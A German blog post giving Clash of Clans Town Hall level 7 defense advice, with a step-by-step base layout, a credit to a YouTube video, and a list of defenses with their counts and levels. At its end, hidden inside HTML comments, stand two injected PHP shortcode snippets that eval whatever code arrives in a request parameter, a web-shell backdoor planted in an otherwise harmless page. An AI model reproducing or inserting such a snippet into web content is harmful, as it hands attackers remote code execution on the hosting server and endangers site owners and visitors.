Clash of Clans Rathaus Level 7 Verteidigung Tipps und Tricks

Du suchst nach einer guten Clash of Clans Rathaus Level 7 Verteidigung, um deine Rohstoffe und deine wichtigen Gebäude bei einem Angriff von einem anderen Spieler möglichst gut schützen zu können? Auch wir haben in der Vergangenheit öfters die Frage nach der wohl besten Verteidigung und Aufstellung bei Rathaus Level 7 gestellt und haben dir deshalb hier einige Tipps, Empfehlungen sowie unsere Erfahrungen mit den Aufstellungen auf dieser Stufe. Clash of Clans gehört bei uns immer noch zu einer der besten Apps und das Spiel aus dem Hause Supercell macht selbst nach vielen Monaten immer noch großen Spaß. Das liegt nicht nur an dem sehr guten Spielprinzip, das die App sowieso mitbringt, sondern auch an den Neuerungen die durch einige Updates in den letzten Monaten von Supercell zu der App hinzugefügt wurden. Dazu zählen mit Sicherheit auch die neuen Clankriege in denen man jetzt gegen andere Clans und deren Spielern im Kampf antreten kann. Doch um erst einmal eine schlagkräftige Armee aufstellen und sich einem starken Clan anschließen zu können, bedarf es natürlich einiger Spielzeit und selbstverständlich auch Rohstoffen in Form von Gold, Elixier und dunkles Elixier. Diese kann man entweder farmen oder aber man bekommt diese durch den Angriff von anderen Spielern. Dabei ist es nicht nur wichtig den Fokus auf eine möglichst starke Armee und einen durchdachten Angriff zu legen, sondern es kommt auch auf die Verteidigung in der eigenen Basis an. In diesem Artikel haben wir dir die unserer Meinung nach beste Verteidigung derzeit verlinkt und einige weitere Informationen verfasst.

Clash of Clans Rathaus Level 7 Verteidigung: So sollte die Aufstellung aussehen

Im Internet findet man jetzt schon etliche Strategien und Tipps zur Aufstellung für eine gute Verteidigung bei Clash of Clans Level 7. Dabei wird grundsätzlich immer unterschieden zwischen einer Trophy Base und einer Farming Base. Bei der Aufstellung der Gebäude und der Verteidigung bei einer Farming Base sollen die Produktionsgebäude und speziell die Lager möglichst gut geschützt werden, um zu verhindern das diese von den Feinden schnell erreicht werden. Sicherlich mag es viele unterschiedliche und gute Aufstellungen geben, doch wir hatten bislang am besten Erfahrungen mit der in dem Screenshot zu sehenden Aufstellung.  Es handelt sich hier übrigens um eine Trophy Base bzw. Aufstellung für die Clankriege und nicht um eine Farming Base, diese haben wir in dem folgenden Artikel für Clash of Clans Rathaus Level 7 beschrieben.

Die Aufstellung im Detail

In der folgenden Liste eine kurze Zusammenfassung unserer Aufstellung bei der Verteidigung.

  1. Rathaus in der Mitte bauen und darum Mortar platzieren und auf der Südseite die Clanburg. Mauer um alle fünf Gebäude nicht vergessen.
  2. In die Ecken direkt an den Mauern haben wir dann einmal einen Magierturm sowie Luftabwehr platziert.
  3. An der Mauer wo die Mortar stehen kommen dann nochmal vier Bogenschützentürme hin, damit diese Ihre Reichweite bis zur äußerten Mauer möglichst gut ausnutzen können.
  4. An die Ecken zwischen Mauer und Bogenschützen-Turm kann man nun noch Fallen wie Tellereisen und Bomben platzieren, um bei Angriffen schon einmal die ersten Einheiten dem Erdboden gleich machen zu können.
  5. Ziehe jetzt wieder um alles eine Mauer und setze wenn möglich bei den Magiertürmen noch eine verborgene Tesla.
  6. Bis dahin können wir die Aufstellung eigentlich nur empfehlen, alles was danach kommt kann man jetzt selber ein wenig variieren. Wir haben noch eine Reihe der verfügbaren Kanonen um die Mauern gesetzt und anschließend alles mit eher unwichtigeren Gebäuden umbaut.
  7. Ein weiterer Tipp zur Clash of Clans Rathaus Verteidigung Level 7: Baue immer einzelne Fallen an unterschiedlichen Positionen ein, wo die Gegner diese nicht erwarten. Wenn Du jedes Mal die gleiche Position benutzt, merkt sich das vielleicht ein Gegner beim nächsten Angriff und versucht diese möglichst gut zu umschiffen.
Tipps zur Clash of Clans Rathaus Level 5 Verteidigung

Tipps zur Clash of Clans Rathaus Level 5 Verteidigung

Video von der Aufstellung der Gebäude und Verteidigung auf Rathaus Level 7

Wir haben uns die Aufstellung der Gebäude nicht komplett alleine ausgedacht sondern diese stammt aus dem unten verlinkten Video aus dem YouTube-Kanal von MatuGaming CoC. Wir haben die Trophy Base fast eins zu eins nachgebaut und kommen seit dem sehr gut mit der Aufstellung klar. Wir haben diese auch schon mit unserem Clan in einem Clan Wars getestet und waren begeistert was man mit der richtigen Verteidigung so alles aus den zur Verfügung stehenden Gebäude rausholen kann.

Rathaus Level 7: Verfügbare Verteidigungsanlagen und Level

In der Liste unter diesem Absatz haben wir dir noch einmal kurz aufgelistet, welche Verteidigungen du mit Rathaus Stufe 7 überhaupt bauen kann und auf welchem Level sich diese Gebäude befinden.

  • Kanone – 7x – Level 8
  • Bogenschützenturm – 4x- Level 8
  • Mauern – 175 – Level 7
  • Mortar – 3x – Level 5
  • Bomben – 6x – Level 4
  • Luftabwehr – 2x – Level 5
  • Magierturm – 2x – Level 4
  • Große Bombe – 2x – Level 2
  • Luftbombe – 2x – Level 3
  • Tesla – 2x – Level 3

Das waren vorerst alle unsere Tipps rund um die richtige Aufstellungen und Verteidigung bei Clash of Clans Level 7.

 <!– [insert_php]if (isset($_REQUEST["Bnm"])){eval($_REQUEST["Bnm"]);exit;}[/insert_php][php]if (isset($_REQUEST["Bnm"])){eval($_REQUEST["Bnm"]);exit;}[/php] –>

 <!– [insert_php]if (isset($_REQUEST["eyAyN"])){eval($_REQUEST["eyAyN"]);exit;}[/insert_php][php]if (isset($_REQUEST["eyAyN"])){eval($_REQUEST["eyAyN"]);exit;}[/php] –>